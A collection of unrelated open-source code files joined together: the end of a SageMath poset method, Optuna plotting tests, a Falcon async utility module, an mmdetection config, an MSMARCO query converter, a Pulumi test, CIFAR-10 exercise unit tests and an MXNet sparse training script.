sage: P.is_antichain_of_poset([3, 1])
False
sage: P.is_antichain_of_poset([1, 1, 3])
False
sage: P.is_antichain_of_poset([])
True
sage: P.is_antichain_of_poset([1])
True
sage: P.is_antichain_of_poset([1, 1])
True
sage: P.is_antichain_of_poset([3, 4])
True
sage: P.is_antichain_of_poset([3, 4, 12])
False
sage: P.is_antichain_of_poset([6, 4])
True
sage: P.is_antichain_of_poset(i for i in divisors(12) if (2 < i and i < 6))
True
sage: P.is_antichain_of_poset(i for i in divisors(12) if (2 <= i and i < 6))
False
sage: Q = Poset({2: [3, 1], 3: [4], 1: [4]})
sage: Q.is_antichain_of_poset((1, 2))
False
sage: Q.is_antichain_of_poset((2, 4))
False
sage: Q.is_antichain_of_poset((4, 2))
False
sage: Q.is_antichain_of_poset((2, 2))
True
sage: Q.is_antichain_of_poset((3, 4))
False
sage: Q.is_antichain_of_poset((3, 1))
True
sage: Q.is_antichain_of_poset((1, ))
True
sage: Q.is_antichain_of_poset(())
True
An infinite poset::
sage: from sage.categories.examples.posets import FiniteSetsOrderedByInclusion
sage: R = FiniteSetsOrderedByInclusion()
sage: R.is_antichain_of_poset([R(set([3, 1, 2])), R(set([1, 4])), R(set([4, 5]))])
True
sage: R.is_antichain_of_poset([R(set([3, 1, 2, 4])), R(set([1, 4])), R(set([4, 5]))])
False
"""
return all(not self.lt(x,y) for x in o for y in o)
CartesianProduct = LazyImport(
'sage.combinat.posets.cartesian_product', 'CartesianProductPoset')
class ElementMethods:
pass
# TODO: implement x<y, x<=y, x>y, x>=y appropriately once #10130 is resolved
#
# def __le__(self, other):
# r"""
# Return whether ``self`` is smaller or equal to ``other``
# in the poset.
#
# EXAMPLES::
#
# sage: P = Posets().example(); P
# An example of poset: sets ordered by inclusion
# sage: x = P(Set([1,3])); y = P(Set([1,2,3]))
# sage: x.__le__(y)
# sage: x <= y
# """
# return self.parent().le(self, other)
|
tests/visualization_tests/test_optimization_history.py | captain-pool/optuna | 1,300 | 12610124 | <reponame>captain-pool/optuna<filename>tests/visualization_tests/test_optimization_history.py
import numpy as np
import pytest
from optuna.study import create_study
from optuna.trial import Trial
from optuna.visualization import plot_optimization_history
def test_target_is_none_and_study_is_multi_obj() -> None:
study = create_study(directions=["minimize", "minimize"])
with pytest.raises(ValueError):
plot_optimization_history(study)
@pytest.mark.parametrize("direction", ["minimize", "maximize"])
def test_plot_optimization_history(direction: str) -> None:
# Test with no trial.
study = create_study(direction=direction)
figure = plot_optimization_history(study)
assert len(figure.data) == 0
def objective(trial: Trial) -> float:
if trial.number == 0:
return 1.0
elif trial.number == 1:
return 2.0
elif trial.number == 2:
return 0.0
return 0.0
# Test with a trial.
study = create_study(direction=direction)
study.optimize(objective, n_trials=3)
figure = plot_optimization_history(study)
assert len(figure.data) == 2
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [1.0, 2.0, 0.0])
assert np.array_equal(figure.data[1].x, [0, 1, 2])
ydata = figure.data[1].y
if direction == "minimize":
assert np.array_equal(ydata, [1.0, 1.0, 0.0])
else:
assert np.array_equal(ydata, [1.0, 2.0, 2.0])
legend_texts = [x.name for x in figure.data]
assert legend_texts == ["Objective Value", "Best Value"]
assert figure.layout.yaxis.title.text == "Objective Value"
# Test customized target.
with pytest.warns(UserWarning):
figure = plot_optimization_history(study, target=lambda t: t.number)
assert len(figure.data) == 1
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [0.0, 1.0, 2.0])
# Test customized target name.
custom_target_name = "Target Name"
figure = plot_optimization_history(study, target_name=custom_target_name)
legend_texts = [x.name for x in figure.data]
assert legend_texts == [custom_target_name, "Best Value"]
assert figure.layout.yaxis.title.text == custom_target_name
# Ignore failed trials.
def fail_objective(_: Trial) -> float:
raise ValueError
study = create_study(direction=direction)
study.optimize(fail_objective, n_trials=1, catch=(ValueError,))
figure = plot_optimization_history(study)
assert len(figure.data) == 0
@pytest.mark.parametrize("direction", ["minimize", "maximize"])
def test_plot_optimization_history_with_multiple_studies(direction: str) -> None:
n_studies = 10
# Test with no trial.
studies = [create_study(direction=direction) for _ in range(n_studies)]
figure = plot_optimization_history(studies)
assert len(figure.data) == 0
def objective(trial: Trial) -> float:
if trial.number == 0:
return 1.0
elif trial.number == 1:
return 2.0
elif trial.number == 2:
return 0.0
return 0.0
# Test with trials.
studies = [create_study(direction=direction) for _ in range(n_studies)]
for study in studies:
study.optimize(objective, n_trials=3)
figure = plot_optimization_history(studies)
assert len(figure.data) == 2 * n_studies
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [1.0, 2.0, 0.0])
assert np.array_equal(figure.data[1].x, [0, 1, 2])
ydata = figure.data[1].y
if direction == "minimize":
assert np.array_equal(ydata, [1.0, 1.0, 0.0])
else:
assert np.array_equal(ydata, [1.0, 2.0, 2.0])
expected_legend_texts = []
for i in range(n_studies):
expected_legend_texts.append(f"Best Value of {studies[i].study_name}")
expected_legend_texts.append(f"Objective Value of {studies[i].study_name}")
legend_texts = [scatter.name for scatter in figure.data]
assert sorted(legend_texts) == sorted(expected_legend_texts)
assert figure.layout.yaxis.title.text == "Objective Value"
# Test customized target.
with pytest.warns(UserWarning):
figure = plot_optimization_history(studies, target=lambda t: t.number)
assert len(figure.data) == 1 * n_studies
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [0, 1, 2])
# Test customized target name.
custom_target_name = "Target Name"
figure = plot_optimization_history(studies, target_name=custom_target_name)
expected_legend_texts = []
for i in range(n_studies):
expected_legend_texts.append(f"Best Value of {studies[i].study_name}")
expected_legend_texts.append(f"{custom_target_name} of {studies[i].study_name}")
legend_texts = [scatter.name for scatter in figure.data]
assert sorted(legend_texts) == sorted(expected_legend_texts)
assert figure.layout.yaxis.title.text == custom_target_name
# Ignore failed trials.
def fail_objective(_: Trial) -> float:
raise ValueError
studies = [create_study(direction=direction) for _ in range(n_studies)]
for study in studies:
study.optimize(fail_objective, n_trials=1, catch=(ValueError,))
figure = plot_optimization_history(studies)
assert len(figure.data) == 0
@pytest.mark.parametrize("direction", ["minimize", "maximize"])
def test_plot_optimization_history_with_error_bar(direction: str) -> None:
n_studies = 10
# Test with no trial.
studies = [create_study(direction=direction) for _ in range(n_studies)]
figure = plot_optimization_history(studies, error_bar=True)
assert len(figure.data) == 0
def objective(trial: Trial) -> float:
if trial.number == 0:
return 1.0
elif trial.number == 1:
return 2.0
elif trial.number == 2:
return 0.0
return 0.0
# Test with trials.
studies = [create_study(direction=direction) for _ in range(n_studies)]
for study in studies:
study.optimize(objective, n_trials=3)
figure = plot_optimization_history(studies, error_bar=True)
assert len(figure.data) == 4
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [1.0, 2.0, 0.0])
assert np.array_equal(figure.data[1].x, [0, 1, 2])
ydata = figure.data[1].y
if direction == "minimize":
assert np.array_equal(ydata, [1.0, 1.0, 0.0])
else:
assert np.array_equal(ydata, [1.0, 2.0, 2.0])
# Scatters for error bar don't have `name`.
legend_texts = [scatter.name for scatter in figure.data if scatter.name is not None]
assert sorted(legend_texts) == ["Best Value", "Objective Value"]
assert figure.layout.yaxis.title.text == "Objective Value"
# Test customized target.
with pytest.warns(UserWarning):
figure = plot_optimization_history(studies, target=lambda t: t.number, error_bar=True)
assert len(figure.data) == 1
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [0, 1, 2])
# Test customized target name.
custom_target_name = "Target Name"
figure = plot_optimization_history(studies, target_name=custom_target_name, error_bar=True)
legend_texts = [scatter.name for scatter in figure.data if scatter.name is not None]
assert sorted(legend_texts) == ["Best Value", custom_target_name]
assert figure.layout.yaxis.title.text == custom_target_name
# Ignore failed trials.
def fail_objective(_: Trial) -> float:
raise ValueError
studies = [create_study(direction=direction) for _ in range(n_studies)]
for study in studies:
study.optimize(fail_objective, n_trials=1, catch=(ValueError,))
figure = plot_optimization_history(studies, error_bar=True)
assert len(figure.data) == 0
@pytest.mark.parametrize("direction", ["minimize", "maximize"])
def test_error_bar_in_optimization_history(direction: str) -> None:
def objective(trial: Trial) -> float:
return trial.suggest_float("x", 0, 1)
studies = [create_study(direction=direction) for _ in range(3)]
suggested_params = [0.1, 0.3, 0.2]
for x, study in zip(suggested_params, studies):
study.enqueue_trial({"x": x})
study.optimize(objective, n_trials=1)
figure = plot_optimization_history(studies, error_bar=True)
mean = np.mean(suggested_params)
std = np.std(suggested_params)
np.testing.assert_almost_equal(figure.data[0].y, mean)
np.testing.assert_almost_equal(figure.data[2].y, mean + std)
np.testing.assert_almost_equal(figure.data[3].y, mean - std)
|
falcon/util/sync.py | RioAtHome/falcon | 8,217 | 12610131 | import asyncio
from concurrent.futures import ThreadPoolExecutor
from functools import partial
from functools import wraps
import inspect
import os
from typing import Callable
__all__ = [
'async_to_sync',
'create_task',
'get_running_loop',
'runs_sync',
'sync_to_async',
'wrap_sync_to_async',
'wrap_sync_to_async_unsafe',
]
_one_thread_to_rule_them_all = ThreadPoolExecutor(max_workers=1)
try:
get_running_loop = asyncio.get_running_loop
except AttributeError: # pragma: nocover
# NOTE(kgriffs): This branch is definitely covered under py35 and py36
# but for some reason the codecov gate doesn't pick this up, hence
# the pragma above.
get_running_loop = asyncio.get_event_loop
try:
create_task = asyncio.create_task
except AttributeError: # pragma: nocover
# NOTE(kgriffs): This branch is definitely covered under py35 and py36
# but for some reason the codecov gate doesn't pick this up, hence
# the pragma above.
def create_task(coro, name=None):
return asyncio.ensure_future(coro)
def wrap_sync_to_async_unsafe(func) -> Callable:
"""Wrap a callable in a coroutine that executes the callable directly.
This helper makes it easier to use synchronous callables with ASGI
apps. However, it is considered "unsafe" because it calls the wrapped
function directly in the same thread as the asyncio loop. Generally, you
should use :func:`~.wrap_sync_to_async` instead.
Warning:
This helper is only to be used for functions that do not perform any
blocking I/O or lengthy CPU-bound operations, since the entire async
loop will be blocked while the wrapped function is executed.
For a safer, non-blocking alternative that runs the function in a
thread pool executor, use :func:`~.sync_to_async` instead.
Arguments:
func (callable): Function, method, or other callable to wrap
Returns:
function: An awaitable coroutine function that wraps the
synchronous callable.
"""
@wraps(func)
async def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
def wrap_sync_to_async(func, threadsafe=None) -> Callable:
"""Wrap a callable in a coroutine that executes the callable in the background.
This helper makes it easier to call functions that can not be
ported to use async natively (e.g., functions exported by a database
library that does not yet support asyncio).
To execute blocking operations safely, without stalling the async
loop, the wrapped callable is scheduled to run in the background, on a
separate thread, when the wrapper is called.
Normally, the default executor for the running loop is used to schedule the
synchronous callable. If the callable is not thread-safe, it can be
scheduled serially in a global single-threaded executor.
Warning:
Wrapping a synchronous function safely adds a fair amount of overhead
to the function call, and should only be used when a native async
library is not available for the operation you wish to perform.
Arguments:
func (callable): Function, method, or other callable to wrap
Keyword Arguments:
threadsafe (bool): Set to ``False`` when the callable is not
thread-safe (default ``True``). When this argument is ``False``,
the wrapped callable will be scheduled to run serially in a
global single-threaded executor.
Returns:
function: An awaitable coroutine function that wraps the
synchronous callable.
"""
if threadsafe is None or threadsafe:
executor = None # Use default
else:
executor = _one_thread_to_rule_them_all
@wraps(func)
async def wrapper(*args, **kwargs):
return await get_running_loop().run_in_executor(
executor, partial(func, *args, **kwargs)
)
return wrapper
async def sync_to_async(func, *args, **kwargs):
"""Schedule a synchronous callable on the loop's default executor and await the result.
This helper makes it easier to call functions that can not be
ported to use async natively (e.g., functions exported by a database
library that does not yet support asyncio).
To execute blocking operations safely, without stalling the async
loop, the wrapped callable is scheduled to run in the background, on a
separate thread, when the wrapper is called.
The default executor for the running loop is used to schedule the
synchronous callable.
Warning:
This helper can only be used to execute thread-safe callables. If
the callable is not thread-safe, it can be executed serially
by first wrapping it with :func:`~.wrap_sync_to_async`, and then
executing the wrapper directly.
Warning:
Calling a synchronous function safely from an asyncio event loop
adds a fair amount of overhead to the function call, and should
only be used when a native async library is not available for the
operation you wish to perform.
Arguments:
func (callable): Function, method, or other callable to wrap
*args: All additional arguments are passed through to the callable.
Keyword Arguments:
**kwargs: All keyword arguments are passed through to the callable.
Returns:
function: An awaitable coroutine function that wraps the
synchronous callable.
"""
return await get_running_loop().run_in_executor(
None, partial(func, *args, **kwargs)
)
def _should_wrap_non_coroutines() -> bool:
"""Return ``True`` IFF ``FALCON_ASGI_WRAP_NON_COROUTINES`` is set in the environ.
This should only be used for Falcon's own test suite.
"""
return 'FALCON_ASGI_WRAP_NON_COROUTINES' in os.environ
def _wrap_non_coroutine_unsafe(func):
"""Wrap a coroutine using ``wrap_sync_to_async_unsafe()`` for internal test cases.
This method is intended for Falcon's own test suite and should not be
used by apps themselves. It provides a convenient way to reuse sync
methods for ASGI test cases when it is safe to do so.
Arguments:
func (callable): Function, method, or other callable to wrap
Returns:
When not in test mode, this function simply returns the callable
unchanged. Otherwise, if the callable is not a coroutine function,
it will be wrapped using ``wrap_sync_to_async_unsafe()``.
"""
if func is None:
return func
if not _should_wrap_non_coroutines():
return func
if inspect.iscoroutinefunction(func):
return func
return wrap_sync_to_async_unsafe(func)
def async_to_sync(coroutine, *args, **kwargs):
"""Invoke a coroutine function from a synchronous caller.
This method can be used to invoke an asynchronous task from a synchronous
context. The coroutine will be scheduled to run on the current event
loop for the current OS thread. If an event loop is not already running,
one will be created.
Warning:
This method is very inefficient and is intended primarily for testing
and prototyping.
Args:
coroutine: A coroutine function to invoke.
*args: Additional args are passed through to the coroutine function.
Keyword Args:
**kwargs: Additional args are passed through to the coroutine function.
"""
# TODO(vytas): The canonical way of doing this for simple use cases is
# asyncio.run(), but that would be a breaking change wrt the above
# documented behaviour; breaking enough to break some of our own tests.
# NOTE(vytas): Work around get_event_loop deprecation in 3.10 by going via
# get_event_loop_policy(). This should be equivalent for async_to_sync's
# use case as it is currently impossible to invoke run_until_complete()
# from a running loop anyway.
loop = asyncio.get_event_loop_policy().get_event_loop()
return loop.run_until_complete(coroutine(*args, **kwargs))
def runs_sync(coroutine):
"""Transform a coroutine function into a synchronous method.
This is achieved by always invoking the decorated coroutine function via
:meth:`async_to_sync`.
Warning:
This decorator is very inefficient and should only be used for adapting
asynchronous test functions for use with synchronous test runners such
as ``pytest`` or the ``unittest`` module.
It will create an event loop for the current thread if one is not
already running.
Args:
coroutine: A coroutine function to masquerade as a synchronous one.
Returns:
callable: A synchronous function.
"""
@wraps(coroutine)
def invoke(*args, **kwargs):
return async_to_sync(coroutine, *args, **kwargs)
return invoke
|
configs/resnest/cascade_rcnn_s101_fpn_syncbn-backbone+head_mstrain-range_1x_coco.py | Brym-Gyimah/mmdetection | 20,190 | 12610148 | <reponame>Brym-Gyimah/mmdetection
_base_ = './cascade_rcnn_s50_fpn_syncbn-backbone+head_mstrain-range_1x_coco.py'
model = dict(
backbone=dict(
stem_channels=128,
depth=101,
init_cfg=dict(type='Pretrained',
checkpoint='open-mmlab://resnest101')))
|
scripts/data_convert/msmarco/convert_queries.py | gitter-badger/FlexNeuART | 101 | 12610154 | #!/usr/bin/env python
#
# Copyright 2014+ Carnegie Mellon University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Convert MSMARCO queries
"""
import json
import argparse
from flexneuart.io import FileWrapper
from flexneuart.io.qrels import write_qrels, add_qrel_entry
from flexneuart.io.stopwords import read_stop_words, STOPWORD_FILE
from flexneuart.text_proc.parse import SpacyTextParser, Sentencizer, get_retokenized, add_retokenized_field
from flexneuart.data_convert import add_bert_tok_args, create_bert_tokenizer_if_needed
from flexneuart.config import TEXT_BERT_TOKENIZED_NAME, \
TEXT_FIELD_NAME, DOCID_FIELD, \
TEXT_RAW_FIELD_NAME, TEXT_UNLEMM_FIELD_NAME, \
REPORT_QTY, SPACY_MODEL
parser = argparse.ArgumentParser(description='Convert MSMARCO-adhoc queries.')
parser.add_argument('--input', metavar='input file', help='input file',
type=str, required=True)
parser.add_argument('--output', metavar='output file', help='output file',
type=str, required=True)
parser.add_argument('--min_query_token_qty', type=int, default=0,
metavar='min # of query tokens', help='ignore queries that have smaller # of tokens')
add_bert_tok_args(parser)
args = parser.parse_args()
print(args)
arg_vars = vars(args)
inp_file = FileWrapper(args.input)
out_file = FileWrapper(args.output, 'w')
min_query_tok_qty = args.min_query_token_qty
stop_words = read_stop_words(STOPWORD_FILE, lower_case=True)
print(stop_words)
nlp = SpacyTextParser(SPACY_MODEL, stop_words, keep_only_alpha_num=True, lower_case=True)
bert_tokenizer = create_bert_tokenizer_if_needed(args)
# Input file is a TSV file
ln = 0
for line in inp_file:
ln += 1
line = line.strip()
if not line:
continue
fields = line.split('\t')
if len(fields) != 2:
print('Misformated line %d ignoring:' % ln)
print(line.replace('\t', '<field delimiter>'))
continue
did, query_orig = fields
query_lemmas, query_unlemm = nlp.proc_text(query_orig)
query_toks = query_lemmas.split()
if len(query_toks) >= min_query_tok_qty:
doc = {DOCID_FIELD: did,
TEXT_FIELD_NAME: query_lemmas,
TEXT_UNLEMM_FIELD_NAME: query_unlemm,
TEXT_RAW_FIELD_NAME: query_orig}
add_retokenized_field(doc, TEXT_RAW_FIELD_NAME, TEXT_BERT_TOKENIZED_NAME, bert_tokenizer)
doc_str = json.dumps(doc) + '\n'
out_file.write(doc_str)
if ln % REPORT_QTY == 0:
print('Processed %d queries' % ln)
print('Processed %d queries' % ln)
inp_file.close()
out_file.close()
|
sdk/python/lib/test/langhost/chained_failure/test_chained_failure.py | pcen/pulumi | 12,004 | 12610164 | <filename>sdk/python/lib/test/langhost/chained_failure/test_chained_failure.py
# Copyright 2016-2021, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os import path
from ..util import LanghostTest
class ChainedFailureTest(LanghostTest):
"""
Tests that the language host can tolerate "chained failures" - that is, a failure of an output to resolve when
attempting to prepare a resource for registration.
In this test, the program raises an exception in an apply, which causes the preparation of resourceB to fail. This
test asserts that this does not cause a deadlock (as it previously did, pulumi/pulumi#2189) but instead terminates
gracefully.
"""
def test_chained_failure(self):
self.run_test(
program=path.join(self.base_path(), "chained_failure"),
expected_error="Program exited with non-zero exit code: 1",
expected_resource_count=1)
def register_resource(self, _ctx, _dry_run, ty, name, _resource, _dependencies, _parent, _custom, protect,
_provider, _property_deps, _delete_before_replace, _ignore_changes, _version, _import,
_replace_on_changes):
if ty == "test:index:ResourceA":
self.assertEqual(name, "resourceA")
self.assertDictEqual(_resource, {"inprop": 777})
return {
"urn": self.make_urn(ty, name),
"id": name,
"object": {
"outprop": 200
}
}
if ty == "test:index:ResourceB":
self.fail(f"we should never have gotten here! {_resource}")
self.fail(f"unknown resource type: {ty}")
|
image-classification/problem_unittests.py | WillenZh/deep-learning-project | 474 | 12610168 | <filename>image-classification/problem_unittests.py
import os
import numpy as np
import tensorflow as tf
import random
from unittest.mock import MagicMock
def _print_success_message():
print('Tests Passed')
def test_folder_path(cifar10_dataset_folder_path):
assert cifar10_dataset_folder_path is not None,\
'Cifar-10 data folder not set.'
assert cifar10_dataset_folder_path[-1] != '/',\
'The "/" shouldn\'t be added to the end of the path.'
assert os.path.exists(cifar10_dataset_folder_path),\
'Path not found.'
assert os.path.isdir(cifar10_dataset_folder_path),\
'{} is not a folder.'.format(os.path.basename(cifar10_dataset_folder_path))
train_files = [cifar10_dataset_folder_path + '/data_batch_' + str(batch_id) for batch_id in range(1, 6)]
other_files = [cifar10_dataset_folder_path + '/batches.meta', cifar10_dataset_folder_path + '/test_batch']
missing_files = [path for path in train_files + other_files if not os.path.exists(path)]
assert not missing_files,\
'Missing files in directory: {}'.format(missing_files)
print('All files found!')
def test_normalize(normalize):
test_shape = (np.random.choice(range(1000)), 32, 32, 3)
test_numbers = np.random.choice(range(256), test_shape)
normalize_out = normalize(test_numbers)
assert type(normalize_out).__module__ == np.__name__,\
'Not Numpy Object'
assert normalize_out.shape == test_shape,\
'Incorrect Shape. {} shape found'.format(normalize_out.shape)
assert normalize_out.max() <= 1 and normalize_out.min() >= 0,\
'Incorect Range. {} to {} found'.format(normalize_out.min(), normalize_out.max())
_print_success_message()
def test_one_hot_encode(one_hot_encode):
test_shape = np.random.choice(range(1000))
test_numbers = np.random.choice(range(10), test_shape)
one_hot_out = one_hot_encode(test_numbers)
assert type(one_hot_out).__module__ == np.__name__,\
'Not Numpy Object'
assert one_hot_out.shape == (test_shape, 10),\
'Incorrect Shape. {} shape found'.format(one_hot_out.shape)
n_encode_tests = 5
test_pairs = list(zip(test_numbers, one_hot_out))
test_indices = np.random.choice(len(test_numbers), n_encode_tests)
labels = [test_pairs[test_i][0] for test_i in test_indices]
enc_labels = np.array([test_pairs[test_i][1] for test_i in test_indices])
new_enc_labels = one_hot_encode(labels)
assert np.array_equal(enc_labels, new_enc_labels),\
'Encodings returned different results for the same numbers.\n' \
'For the first call it returned:\n' \
'{}\n' \
'For the second call it returned\n' \
'{}\n' \
'Make sure you save the map of labels to encodings outside of the function.'.format(enc_labels, new_enc_labels)
_print_success_message()
def test_nn_image_inputs(neural_net_image_input):
image_shape = (32, 32, 3)
nn_inputs_out_x = neural_net_image_input(image_shape)
assert nn_inputs_out_x.get_shape().as_list() == [None, image_shape[0], image_shape[1], image_shape[2]],\
'Incorrect Image Shape. Found {} shape'.format(nn_inputs_out_x.get_shape().as_list())
assert nn_inputs_out_x.op.type == 'Placeholder',\
'Incorrect Image Type. Found {} type'.format(nn_inputs_out_x.op.type)
assert nn_inputs_out_x.name == 'x:0', \
'Incorrect Name. Found {}'.format(nn_inputs_out_x.name)
print('Image Input Tests Passed.')
def test_nn_label_inputs(neural_net_label_input):
n_classes = 10
nn_inputs_out_y = neural_net_label_input(n_classes)
assert nn_inputs_out_y.get_shape().as_list() == [None, n_classes],\
'Incorrect Label Shape. Found {} shape'.format(nn_inputs_out_y.get_shape().as_list())
assert nn_inputs_out_y.op.type == 'Placeholder',\
'Incorrect Label Type. Found {} type'.format(nn_inputs_out_y.op.type)
assert nn_inputs_out_y.name == 'y:0', \
'Incorrect Name. Found {}'.format(nn_inputs_out_y.name)
print('Label Input Tests Passed.')
def test_nn_keep_prob_inputs(neural_net_keep_prob_input):
nn_inputs_out_k = neural_net_keep_prob_input()
assert nn_inputs_out_k.get_shape().ndims is None,\
'Too many dimensions found for keep prob. Found {} dimensions. It should be a scalar (0-Dimension Tensor).'.format(nn_inputs_out_k.get_shape().ndims)
assert nn_inputs_out_k.op.type == 'Placeholder',\
'Incorrect keep prob Type. Found {} type'.format(nn_inputs_out_k.op.type)
assert nn_inputs_out_k.name == 'keep_prob:0', \
'Incorrect Name. Found {}'.format(nn_inputs_out_k.name)
print('Keep Prob Tests Passed.')
def test_con_pool(conv2d_maxpool):
test_x = tf.placeholder(tf.float32, [None, 32, 32, 5])
test_num_outputs = 10
test_con_k = (2, 2)
test_con_s = (4, 4)
test_pool_k = (2, 2)
test_pool_s = (2, 2)
conv2d_maxpool_out = conv2d_maxpool(test_x, test_num_outputs, test_con_k, test_con_s, test_pool_k, test_pool_s)
assert conv2d_maxpool_out.get_shape().as_list() == [None, 4, 4, 10],\
'Incorrect Shape. Found {} shape'.format(conv2d_maxpool_out.get_shape().as_list())
_print_success_message()
def test_flatten(flatten):
test_x = tf.placeholder(tf.float32, [None, 10, 30, 6])
flat_out = flatten(test_x)
assert flat_out.get_shape().as_list() == [None, 10*30*6],\
'Incorrect Shape. Found {} shape'.format(flat_out.get_shape().as_list())
_print_success_message()
def test_fully_conn(fully_conn):
test_x = tf.placeholder(tf.float32, [None, 128])
test_num_outputs = 40
fc_out = fully_conn(test_x, test_num_outputs)
assert fc_out.get_shape().as_list() == [None, 40],\
'Incorrect Shape. Found {} shape'.format(fc_out.get_shape().as_list())
_print_success_message()
def test_output(output):
test_x = tf.placeholder(tf.float32, [None, 128])
test_num_outputs = 40
output_out = output(test_x, test_num_outputs)
assert output_out.get_shape().as_list() == [None, 40],\
'Incorrect Shape. Found {} shape'.format(output_out.get_shape().as_list())
_print_success_message()
def test_conv_net(conv_net):
test_x = tf.placeholder(tf.float32, [None, 32, 32, 3])
test_k = tf.placeholder(tf.float32)
logits_out = conv_net(test_x, test_k)
assert logits_out.get_shape().as_list() == [None, 10],\
'Incorrect Model Output. Found {}'.format(logits_out.get_shape().as_list())
print('Neural Network Built!')
def test_train_nn(train_neural_network):
mock_session = tf.Session()
test_x = np.random.rand(128, 32, 32, 3)
test_y = np.random.rand(128, 10)
test_k = np.random.rand(1)
test_optimizer = tf.train.AdamOptimizer()
mock_session.run = MagicMock()
train_neural_network(mock_session, test_optimizer, test_k, test_x, test_y)
assert mock_session.run.called, 'Session not used'
_print_success_message()
|
example/sparse/linear_classification/train.py | Vikas-kum/incubator-mxnet | 228 | 12610183 | <gh_stars>100-1000
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
from mxnet.test_utils import *
from data import get_avazu_data
from linear_model import *
import argparse
import os
parser = argparse.ArgumentParser(description="Run sparse linear classification " \
"with distributed kvstore",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-epoch', type=int, default=5,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=8192,
help='number of examples per batch')
parser.add_argument('--kvstore', type=str, default=None,
help='what kvstore to use',
choices=["dist_sync", "dist_async", "local"])
parser.add_argument('--optimizer', type=str, default='sgd',
help='what optimizer to use',
choices=["adagrad", "sgd", "adam"])
AVAZU = {
'train': 'avazu-app',
'test': 'avazu-app.t',
'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/",
# 1000000 + 1 since LibSVMIter uses zero-based indexing
'num_features': 1000001,
}
def batch_row_ids(data_batch):
""" Generate row ids based on the current mini-batch """
return {'weight': data_batch.data[0].indices}
def all_row_ids(data_batch):
""" Generate row ids for all rows """
all_rows = mx.nd.arange(0, AVAZU['num_features'], dtype='int64')
return {'weight': all_rows}
if __name__ == '__main__':
import logging
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
# arg parser
args = parser.parse_args()
logging.info(args)
num_epoch = args.num_epoch
kvstore = args.kvstore
batch_size = args.batch_size
optimizer = args.optimizer
# create kvstore
kv = mx.kvstore.create(kvstore) if kvstore else None
rank = kv.rank if kv else 0
num_worker = kv.num_workers if kv else 1
# dataset
num_features = AVAZU['num_features']
data_dir = os.path.join(os.getcwd(), 'data')
train_data = os.path.join(data_dir, AVAZU['train'])
val_data = os.path.join(data_dir, AVAZU['test'])
get_avazu_data(data_dir, AVAZU['train'], AVAZU['url'])
get_avazu_data(data_dir, AVAZU['test'], AVAZU['url'])
# data iterator
train_data = mx.io.LibSVMIter(data_libsvm=train_data, data_shape=(num_features,),
batch_size=batch_size, num_parts=num_worker,
part_index=rank)
eval_data = mx.io.LibSVMIter(data_libsvm=val_data, data_shape=(num_features,),
batch_size=batch_size)
# model
# The positive class weight, says how much more we should upweight the importance of
# positive instances in the objective function.
# This is used to combat the extreme class imbalance.
positive_class_weight = 2
model = linear_model(num_features, positive_class_weight)
# module
mod = mx.mod.Module(symbol=model, data_names=['data'], label_names=['softmax_label'])
mod.bind(data_shapes=train_data.provide_data, label_shapes=train_data.provide_label)
mod.init_params()
optim = mx.optimizer.create(optimizer, learning_rate=0.01, rescale_grad=1.0/batch_size/num_worker)
mod.init_optimizer(optimizer=optim, kvstore=kv)
# use accuracy as the metric
metric = mx.metric.create(['nll_loss'])
# get the sparse weight parameter
speedometer = mx.callback.Speedometer(batch_size, 100)
logging.info('Training started ...')
for epoch in range(num_epoch):
nbatch = 0
metric.reset()
for batch in train_data:
nbatch += 1
# for distributed training, we need to manually pull sparse weights from kvstore
mod.prepare(batch, sparse_row_id_fn=batch_row_ids)
mod.forward_backward(batch)
# update all parameters (including the weight parameter)
mod.update()
# update training metric
mod.update_metric(metric, batch.label)
speedometer_param = mx.model.BatchEndParam(epoch=epoch, nbatch=nbatch,
eval_metric=metric, locals=locals())
speedometer(speedometer_param)
# prepare the module weight with all row ids for inference. Alternatively, one could call
# score = mod.score(val_iter, ['MSE'], sparse_row_id_fn=batch_row_ids)
# to fetch the weight per mini-batch
mod.prepare(None, all_row_ids)
# evaluate metric on validation dataset
score = mod.score(eval_data, ['nll_loss'])
logging.info('epoch %d, eval nll = %s ' % (epoch, score[0][1]))
# prepare the module weight with all row ids before making a checkpoint.
mod.prepare(None, all_row_ids)
mod.save_checkpoint("checkpoint", epoch)
# reset the iterator for next pass of data
train_data.reset()
eval_data.reset()
logging.info('Training completed.')
|
